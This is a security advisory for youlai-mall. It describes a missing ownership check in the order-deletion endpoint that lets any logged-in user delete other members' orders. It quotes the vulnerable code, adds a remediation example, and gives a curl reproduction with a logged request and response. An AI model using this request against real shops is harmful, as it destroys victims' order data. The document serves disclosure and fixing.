youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts
Contributors: Huang Weigang
1. Vulnerability Impact
- youlai-mall (latest): https://github.com/youlaitech/youlai-mall
2. Vulnerability Location
- DELETE /mall-oms/app-api/v1/orders/{orderId}
3. Code Analysis
- File:
  mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java
- Route and method:
  // Reachable by any authenticated App user: the orderId comes straight from the
  // path and is handed to the service with no @PreAuthorize guard on the handler.
  @DeleteMapping("/{orderId}")
  public Result<Boolean> deleteOrder(@PathVariable Long orderId) {
      boolean result = orderService.deleteById(orderId);
      return Result.success(result);
  }
- Service:
  mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.java
  // Hard delete by primary key via this.removeById(): no ownership, status or
  // audit check runs before the row is removed.
  public boolean deleteById(Long orderId) {
      return this.removeById(orderId);
  }
- Issues:
  - No ownership check: nothing validates that the supplied orderId belongs to the currently logged-in member (e.g., comparing the order's memberId with SecurityUtils.getMemberId()).
  - No role/permission control: there is no @PreAuthorize, so any authenticated App user can delete arbitrary orders.
  - Direct parameter trust: the attacker-controlled orderId is used directly in the database deletion without authorization.
  - Supports horizontal privilege escalation: an attacker who supplies a victim's orderId can delete that victim's orders.
  - No state validation: the order status is never checked, so even paid/shipped orders can be deleted.
  - Lacks deletion auditing and a soft-delete mechanism: the delete is a hard delete with no record of who initiated it.
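The checks the issues above describe as missing, written out as an added example (this is not youlai-mall's own code). It assumes a plain in-memory store and hypothetical record types (OrderRecord, AuditEntry, OrderStatus) in place of the project's order entity and removeById(), and it takes the caller's memberId as a method parameter where the project would read SecurityUtils.getMemberId(). In the real service the same ownership, status and audit steps would run inside OrderServiceImpl.deleteById before any delete, with the controller method additionally guarded by @PreAuthorize.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;

/*
 * Added example, not youlai-mall code. It models the checks the advisory says
 * are missing from OrderServiceImpl.deleteById: ownership, order status, and
 * an audit record with soft delete in place of a hard row delete. The records,
 * the OrderStatus enum and the in-memory store are hypothetical stand-ins for
 * the project's order table and removeById(); the caller's memberId is passed
 * in as a parameter where the project would read SecurityUtils.getMemberId().
 * Requires Java 16+ (records).
 */
public class OrderDeletionCheckExample {

    enum OrderStatus { PENDING_PAYMENT, PAID, SHIPPED, COMPLETED, CANCELLED }

    record OrderRecord(long orderId, long memberId, OrderStatus status) {}

    record AuditEntry(long orderId, long actorMemberId, String outcome) {}

    static final class OrderService {
        // Only orders that never reached payment may be deleted by the member.
        private static final Set<OrderStatus> DELETABLE =
                Set.of(OrderStatus.PENDING_PAYMENT, OrderStatus.CANCELLED);

        private final Map<Long, OrderRecord> orders = new HashMap<>();
        private final Set<Long> softDeleted = new HashSet<>(); // rows are kept, only flagged
        private final List<AuditEntry> audit = new ArrayList<>();

        void save(OrderRecord order) {
            orders.put(order.orderId(), order);
        }

        // Soft-deletes the order only if it belongs to currentMemberId and is in a
        // deletable state. Every attempt, allowed or denied, is written to the audit log.
        boolean deleteById(long orderId, long currentMemberId) {
            OrderRecord order = orders.get(orderId);
            // "Not found", "already deleted" and "not yours" get the same answer, so a
            // request with a guessed orderId learns nothing about whether it exists.
            if (order == null || softDeleted.contains(orderId) || order.memberId() != currentMemberId) {
                audit.add(new AuditEntry(orderId, currentMemberId, "DENIED_NOT_OWNER_OR_MISSING"));
                return false;
            }
            if (!DELETABLE.contains(order.status())) {
                audit.add(new AuditEntry(orderId, currentMemberId, "DENIED_STATUS_" + order.status()));
                return false;
            }
            softDeleted.add(orderId);
            audit.add(new AuditEntry(orderId, currentMemberId, "SOFT_DELETED"));
            return true;
        }

        boolean isActive(long orderId) {
            return orders.containsKey(orderId) && !softDeleted.contains(orderId);
        }

        List<AuditEntry> auditLog() {
            return audit;
        }
    }

    public static void main(String[] args) {
        OrderService service = new OrderService();
        // Constructed sample data: member 100 plays User A from the advisory;
        // order 5001 belongs to a different member (200).
        service.save(new OrderRecord(5001L, 200L, OrderStatus.PENDING_PAYMENT));
        service.save(new OrderRecord(5002L, 100L, OrderStatus.PENDING_PAYMENT));
        service.save(new OrderRecord(5003L, 100L, OrderStatus.PAID));

        System.out.println("member 100 -> order 5001 (owned by 200): " + service.deleteById(5001L, 100L));
        System.out.println("member 100 -> order 5002 (own, pending):  " + service.deleteById(5002L, 100L));
        System.out.println("member 100 -> order 5003 (own, paid):     " + service.deleteById(5003L, 100L));
        System.out.println("order 5001 still active: " + service.isActive(5001L));
        service.auditLog().forEach(System.out::println);
    }
}
```

Compile and run with javac and java. The first call (member 100 against order 5001, owned by member 200) is refused and the order stays active, the second (the member's own pending order) succeeds, and the third (the member's own paid order) is refused on status; all three attempts appear in the audit log. Returning the same failure for "missing" and "not owned" is deliberate, so the endpoint cannot be used to confirm which orderIds exist.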
Vulnerability Reproduction
-- Preconditions
- Attacker has a valid App login token (Authorization: Bearer <token>).
- Victim's orderId is known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints).
- Target endpoint: DELETE /mall-oms/app-api/v1/orders/{orderId}
-- Steps (horizontal privilege escalation: delete another user's order)
- Log in as User A (memberId=100) and obtain a valid token.
- Call the endpoint with User B's orderId (e.g., orderId=5001):
  curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"
- Observe a 200 OK response, for example:
  {"code":"00000","data":true,"msg":"一切ok"}
- Outcome: Without any ownership validation, User A successfully deletes User B's order, causing data loss and business disruption.
-- Example request/response log (reference)
{
  "data": {
    "request_data": {
      "method": "DELETE",
      "url": "http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": true,
      "msg": "一切ok"
    }
  },
  "test": {
    "request_data": {
      "method": "DELETE",
      "url": "http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": true,
      "msg": "一切ok"
    }
  }
}
4. Impact Description
- Unauthorized data deletion
  - Any logged-in user can delete arbitrary orders, causing permanent data loss and destruction of business records.
- Horizontal privilege escalation (BOLA/IDOR)
  - The orderId path parameter is not validated against the authenticated user's identity, allowing cross-account operations.
- Business logic bypass
  - Order deletion should respect business rules (e.g., only pending/cancelled orders can be deleted), but this endpoint allows deletion of any order regardless of status.
- Financial and operational impact
  - Deleting paid or shipped orders can cause financial discrepancies, inventory mismatches, and fulfillment failures.
- Lack of audit trail and recovery
  - A hard delete without logging makes forensic investigation impossible and prevents data recovery.
- Compliance violations
  - E-commerce platforms typically must retain orders for accounting, tax, and legal purposes; unauthorized deletion violates these requirements.
- Attack chain amplification
  - Combined with order enumeration or creation endpoints, attackers can systematically disrupt business operations across multiple accounts.
- System trust erosion
  - Users and administrators lose confidence in data integrity and platform reliability, damaging reputation and business continuity.